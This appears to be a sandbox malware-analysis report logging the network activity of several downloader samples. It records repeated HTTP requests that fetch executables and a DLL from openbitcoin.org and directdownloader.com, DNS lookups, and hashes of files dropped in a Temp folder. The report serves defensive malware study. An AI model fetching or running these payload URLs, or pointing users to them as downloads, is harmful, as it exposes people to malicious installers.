    612 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    528 B
    907 B
    6
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    646 B
    973 B
    8
    6

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    907 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    907 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    643 B
    943 B
    11
    6

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    652 B
    615 B
    7
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    487 B
    608 B
    8
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    642 B
    707 B
    9
    7

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    542 B
    921 B
    6
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    562 B
    1.7kB
    9
    7

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    442 B
    615 B
    7
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    907 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    580 B
    959 B
    7
    6

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    718 B
    921 B
    7
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    405 B
    907 B
    6
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    795 B
    879 B
    9
    4

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    412 B
    881 B
    6
    4

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    556 B
    1.7kB
    9
    7

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    510 B
    961 B
    8
    6

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    479 B
    652 B
    8
    6

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    436 B
    655 B
    7
    6

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    www.openbitcoin.org
    downloaderSTUB.exe
    104 B
    2
  • 142.250.180.19:80
    www.openbitcoin.org
    downloaderSTUB.exe
    104 B
    2
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    594 B
    973 B
    7
    6

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    366 B
    921 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    366 B
    921 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    workspace.google.com
    downloaderDDLR.exe
    52 B
    1
  • 216.239.32.21:80
    http://openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    484 B
    754 B
    8
    6

    HTTP Request

    GET http://openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    890 B
    656 B
    10
    6

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 162.255.119.249:80
    http://www.directdownloader.com/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    356 B
    627 B
    5
    5

    HTTP Request

    GET http://www.directdownloader.com/DirectDownloaderInstaller.exe

    HTTP Response

    302
  • 162.255.119.249:80
    http://www.directdownloader.com/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    441 B
    653 B
    7
    6

    HTTP Request

    GET http://www.directdownloader.com/toolbars/optimizer.exe

    HTTP Response

    302
  • 142.250.200.4:80
    http://www.google.com/enterprise/apps/business/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    632 B
    978 B
    7
    6

    HTTP Request

    GET http://www.google.com/enterprise/apps/business/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 8.8.8.8:53
    www.directdownloader.com
    dns
    downloaderOFFER0.exe
    70 B
    86 B
    1
    1

    DNS Request

    www.directdownloader.com

    DNS Response

    162.255.119.249

  • 8.8.8.8:53
    www.openbitcoin.org
    dns
    downloaderSTUB.exe
    65 B
    115 B
    1
    1

    DNS Request

    www.openbitcoin.org

    DNS Response

    142.250.180.19

  • 8.8.8.8:53
    openbitcoin.org
    dns
    downloaderSTUB.exe
    61 B
    125 B
    1
    1

    DNS Request

    openbitcoin.org

    DNS Response

    216.239.32.21
    216.239.36.21
    216.239.38.21
    216.239.34.21

  • 8.8.8.8:53
    www.google.com
    dns
    downloaderOFFER0.exe
    60 B
    76 B
    1
    1

    DNS Request

    www.google.com

    DNS Response

    142.250.200.4

  • 8.8.8.8:53
    enterprise.google.com
    dns
    downloaderOFFER0.exe
    134 B
    104 B
    2
    1

    DNS Request

    enterprise.google.com

    DNS Request

    enterprise.google.com

    DNS Response

    142.250.200.46

  • 8.8.8.8:53
    gsuite.google.com
    dns
    downloaderOFFER0.exe
    63 B
    79 B
    1
    1

    DNS Request

    gsuite.google.com

    DNS Response

    216.58.213.14

  • 8.8.8.8:53
    workspace.google.com
    dns
    downloaderOFFER0.exe
    198 B
    82 B
    3
    1

    DNS Request

    workspace.google.com

    DNS Request

    workspace.google.com

    DNS Request

    workspace.google.com

    DNS Response

    172.217.169.14

  • 8.8.8.8:53
    www.google.com
    dns
    downloaderOFFER0.exe
    60 B
    76 B
    1
    1

    DNS Request

    www.google.com

    DNS Response

    142.250.200.4

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\a4d25917363d4e2f64b17f8fc6b1f8fc\downloaderOFFER2.exe

    Filesize

    58KB

    MD5

    c7f6ed56312c8fbb58ae6ed445c38df4

    SHA1

    e2dba94ef052db774478b9f7198c1a2298b334e5

    SHA256

    fdb8452173a4f116f6e362ab5466c3c16bf6697502fe3d01db0d82f0e339de24

    SHA512

    ac43e5bb31c3c0876a7768553916cce76d92088e62594e8463b128a0d6e587c48152a5efcf0b2a5e8fb43028d46913df114ae3c3750b7e6c4212c7044518ba43

  • C:\Users\Admin\AppData\Local\Temp\a4d25917363d4e2f64b17f8fc6b1f8fc\preinstaller.exe

    Filesize

    213KB

    MD5

    06baef00ae0f0e42fc5fea24fc4eac42

    SHA1

    9161574590f09cfe4c24498827386ed57f2e8c58

    SHA256

    19460c3c1b450286c68fba77086c561e740374ae5c44213dd2ec22dc52a430b8

    SHA512

    29431ff9f16fdd4122a10dfec0f260a4397e776daae2ef17defae71e037f082d48d186a24d229c408c9d1b0b4f02aaeaa69011e44cf399795f9c09903ac51486

  • \Users\Admin\AppData\Local\Temp\a4d25917363d4e2f64b17f8fc6b1f8fc\preinstaller.exe

    Filesize

    188KB

    MD5

    5a4bd36ae4173a945106c64e2ec1a190

    SHA1

    a311fc656cdd54a4e54fb2f98e504a16a82836cd

    SHA256

    515ebabab1f3bf41f767a44f1fccf2d3a2304ac72bfa63ffd6064319fd22a849

    SHA512

    14c3f89d8cb91aa5e7ae65feb2126c19da22ab132c44ce5e423c0294db9f0cf5360f02b765dd6b1102e2eb7f8902dc28bef87f6aec24a168a75748c6424b5593

  • \Users\Admin\AppData\Local\Temp\nsy6597.tmp\NSISdl.dll

    Filesize

    14KB

    MD5

    a5f8399a743ab7f9c88c645c35b1ebb5

    SHA1

    168f3c158913b0367bf79fa413357fbe97018191

    SHA256

    dacc88a12d3ba438fdae3535dc7a5a1d389bce13adc993706424874a782e51c9

    SHA512

    824e567f5211bf09c7912537c7836d761b0934207612808e9a191f980375c6a97383dbc6b4a7121c6b5f508cbfd7542a781d6b6b196ca24841f73892eec5e977

  • memory/2500-53-0x0000000000400000-0x0000000000446000-memory.dmp

    Filesize

    280KB

  • memory/2668-54-0x0000000000400000-0x000000000043F000-memory.dmp

    Filesize

    252KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.